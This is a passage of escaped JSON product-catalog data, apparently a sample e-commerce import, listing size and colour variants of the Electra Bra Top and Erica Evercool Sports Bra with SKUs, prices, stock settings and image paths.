\/b\\/wb01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb01-gray_alt1.jpg,\\/w\\/b\\/wb01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"1553\":{\"sku\":\"WB01-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-L-Purple\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1554\":{\"sku\":\"WB01-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-XL-Black\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb01-black-0.jpg\",\"image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb01-black-0.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"1555\":{\"sku\":\"WB01-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-XL-Gray\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb01-gray_alt1.jpg,\\/w\\/b\\/wb01-gray_back.jpg\",\"image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb01-gray_alt1.jpg,\\/w\\/b\\/wb01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"1556\":{\"sku\":\"WB01-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-XL-Purple\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1557\":{\"sku\":\"WB01\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Bra,material=EverCool&trade;|Organic Cotton|Polyester,pattern=Solid,climate=Indoor|Warm,eco_collection=Yes,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WB01-XS-Black,size=XS,color=Black|sku=WB01-XS-Gray,size=XS,color=Gray|sku=WB01-XS-Purple,size=XS,color=Purple|sku=WB01-S-Black,size=S,color=Black|sku=WB01-S-Gray,size=S,color=Gray|sku=WB01-S-Purple,size=S,color=Purple|sku=WB01-M-Black,size=M,color=Black|sku=WB01-M-Gray,size=M,color=Gray|sku=WB01-M-Purple,size=M,color=Purple|sku=WB01-L-Black,size=L,color=Black|sku=WB01-L-Gray,size=L,color=Gray|sku=WB01-L-Purple,size=L,color=Purple|sku=WB01-XL-Black,size=XL,color=Black|sku=WB01-XL-Gray,size=XL,color=Gray|sku=WB01-XL-Purple,size=XL,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb01-gray_alt1.jpg,\\/w\\/b\\/wb01-gray_back.jpg\",\"image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb01-gray_alt1.jpg,\\/w\\/b\\/wb01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Bra\",\"material\":\"EverCool&trade;|Organic Cotton|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"1558\":{\"sku\":\"WB02-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-XS-Blue\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb02-blue_alt1.jpg,\\/w\\/b\\/wb02-blue_back.jpg\",\"image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb02-blue_alt1.jpg,\\/w\\/b\\/wb02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1559\":{\"sku\":\"WB02-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-XS-Orange\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1560\":{\"sku\":\"WB02-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-XS-Yellow\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1561\":{\"sku\":\"WB02-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports 